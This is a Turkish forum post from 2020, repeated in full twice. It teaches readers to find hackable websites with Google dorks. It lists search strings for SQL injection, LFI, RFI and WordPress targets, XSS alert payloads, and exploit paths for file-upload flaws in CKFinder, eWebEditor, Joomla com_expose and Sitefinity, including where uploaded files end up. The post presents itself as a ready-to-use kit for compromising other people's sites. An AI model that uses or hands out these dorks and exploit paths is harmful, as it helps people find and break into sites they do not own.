- 15 May 2020
- 3
- 2
Her Hangi Açığı Olan Site yi Nasıl Bulurum !
Bu exploitleri ve dorkları vs neyse google da taratın manuel el üzerinden..
Bu işlem biraz zorlayabilir herkesi fakat "DORK" dediğimiz şeyle açıklı siteleri bulacağız. Dorkları google girerek manuel tarama yaparak açıkları bulabilirsiniz. Sonuna " yada ' koyunuz bazı açıklar orta ya çıkabilir.
Sql için Örnek Dorklarımızı Kullanabilirsiniz ! : scannerlerle taratabilirsiniz !
accinfo.php?cartId=
acclogin.php?cartID=
add.php?bookid=
contact.php?cartId=
content.php?id=
Bunlar ve daha çoğu google da var isterseniz dorkları kendiniz geliştirebilirsiniz size fayda sı var kendiniz geliştirirseniz !
XSS Açıklı Site Bulmak için Dork : Bu dorkları geliştirebilirsiniz. Fayda sı var ! scannerlerle bulabilirsiniz.
“><script>alert(“regard”)</script>
“><script>alert(“hacked”)</script>
“><script>alert(“hacker”)</script>
Daha bir çok dork google da var isteyen bulabilir isteyen kendisi geliştirebilir.
-RFI Açıkları nasıl bulunur :
RFI, açıklarını mevcut dorklarla ve scannerlerle bulabilirsiniz.
Örnek Dorklar;
inurl:"com_sitemap"
inurl:"com_hashcash"
inurl:"com_colophon" vs..
Dorkları geliştirebilirsiniz isterseniz google dan farklı dorklar alabilirsiniz ve manuel tarama yapabilirsiniz. !
LFI Açık Site Bulmak için Dork : Scannerlerle taratıp da bulabilirsiniz dorkları !
index.phppagina=
index.phpsite=
main.phpx=
default.phpbody=
Dorkları geliştirip daha iyi olursunuz ama ben yine vereyim sizler için alın kullanın !
Wordpress Site Açıkları için Dork : Scannerlerle taratabilirsiniz.
("category/sin-categoria")
("non-cllassé")
("uncategorized")
Bu dorkları geliştirebilirsiniz.Google yazarak başka dorklar da bulabilirsiniz.
Uploadlı Açıklı Siteler İçin Exploitler :
inurl:includes/ckfinder/ckfinder.html
inurl:”/admin/saveannounce_upload.asp”
inurl:”admin/eWebEditor/Upload.asp”
inurl:”UploadFile/upload.asp”
Dorkları geliştirebilirsiniz scannerlarda yoktur öyle biliyorum.
RTE Upload Açıklı Siteler için Exploitler :
inurl:rte/my_********s/my_files/
inurl:/my_********s/my_files/
exloit: /rte/RTE_popup_file_atch.asp
Dorkları geliştirebilirsiniz scannerlarda yoktur öyle biliyorum.
Editor Açıklı Siteler İçin Eploitler :
inurl:editor/assetmanager/ (arama kodu geliştirilebilir)
EXPLOİT : /Editor/assetmanager/assetmanager.asp
Dorkları geliştirebilirsiniz scannerlerda yoktur.
Joomla Upload Açıklı Siteler İçin Exploitler :
inurl index.php?option=com_expose
Exploit: administrator/components/com_expose/uploadimg.php
Uploadin gittigi yer : /components/com_expose/expose/img/
Dorkları geliştirebilirsiniz.
Sitefinity: Login upload açıgı
inurl:”Sitefinity: Login”
exploit: Sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx
Bu konumuz da bu kadardı kolay gelsin
Bu exploitleri ve dorkları vs neyse google da taratın manuel el üzerinden..
Bu işlem biraz zorlayabilir herkesi fakat "DORK" dediğimiz şeyle açıklı siteleri bulacağız. Dorkları google girerek manuel tarama yaparak açıkları bulabilirsiniz. Sonuna " yada ' koyunuz bazı açıklar orta ya çıkabilir.
Sql için Örnek Dorklarımızı Kullanabilirsiniz ! : scannerlerle taratabilirsiniz !
accinfo.php?cartId=
acclogin.php?cartID=
add.php?bookid=
contact.php?cartId=
content.php?id=
Bunlar ve daha çoğu google da var isterseniz dorkları kendiniz geliştirebilirsiniz size fayda sı var kendiniz geliştirirseniz !
XSS Açıklı Site Bulmak için Dork : Bu dorkları geliştirebilirsiniz. Fayda sı var ! scannerlerle bulabilirsiniz.
“><script>alert(“regard”)</script>
“><script>alert(“hacked”)</script>
“><script>alert(“hacker”)</script>
Daha bir çok dork google da var isteyen bulabilir isteyen kendisi geliştirebilir.
-RFI Açıkları nasıl bulunur :
RFI, açıklarını mevcut dorklarla ve scannerlerle bulabilirsiniz.
Örnek Dorklar;
inurl:"com_sitemap"
inurl:"com_hashcash"
inurl:"com_colophon" vs..
Dorkları geliştirebilirsiniz isterseniz google dan farklı dorklar alabilirsiniz ve manuel tarama yapabilirsiniz. !
LFI Açık Site Bulmak için Dork : Scannerlerle taratıp da bulabilirsiniz dorkları !
index.phppagina=
index.phpsite=
main.phpx=
default.phpbody=
Dorkları geliştirip daha iyi olursunuz ama ben yine vereyim sizler için alın kullanın !
Wordpress Site Açıkları için Dork : Scannerlerle taratabilirsiniz.
("category/sin-categoria")
("non-cllassé")
("uncategorized")
Bu dorkları geliştirebilirsiniz.Google yazarak başka dorklar da bulabilirsiniz.
Uploadlı Açıklı Siteler İçin Exploitler :
inurl:includes/ckfinder/ckfinder.html
inurl:”/admin/saveannounce_upload.asp”
inurl:”admin/eWebEditor/Upload.asp”
inurl:”UploadFile/upload.asp”
Dorkları geliştirebilirsiniz scannerlarda yoktur öyle biliyorum.
RTE Upload Açıklı Siteler için Exploitler :
inurl:rte/my_********s/my_files/
inurl:/my_********s/my_files/
exloit: /rte/RTE_popup_file_atch.asp
Dorkları geliştirebilirsiniz scannerlarda yoktur öyle biliyorum.
Editor Açıklı Siteler İçin Eploitler :
inurl:editor/assetmanager/ (arama kodu geliştirilebilir)
EXPLOİT : /Editor/assetmanager/assetmanager.asp
Dorkları geliştirebilirsiniz scannerlerda yoktur.
Joomla Upload Açıklı Siteler İçin Exploitler :
inurl index.php?option=com_expose
Exploit: administrator/components/com_expose/uploadimg.php
Uploadin gittigi yer : /components/com_expose/expose/img/
Dorkları geliştirebilirsiniz.
Sitefinity: Login upload açıgı
inurl:”Sitefinity: Login”
exploit: Sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx
Bu konumuz da bu kadardı kolay gelsin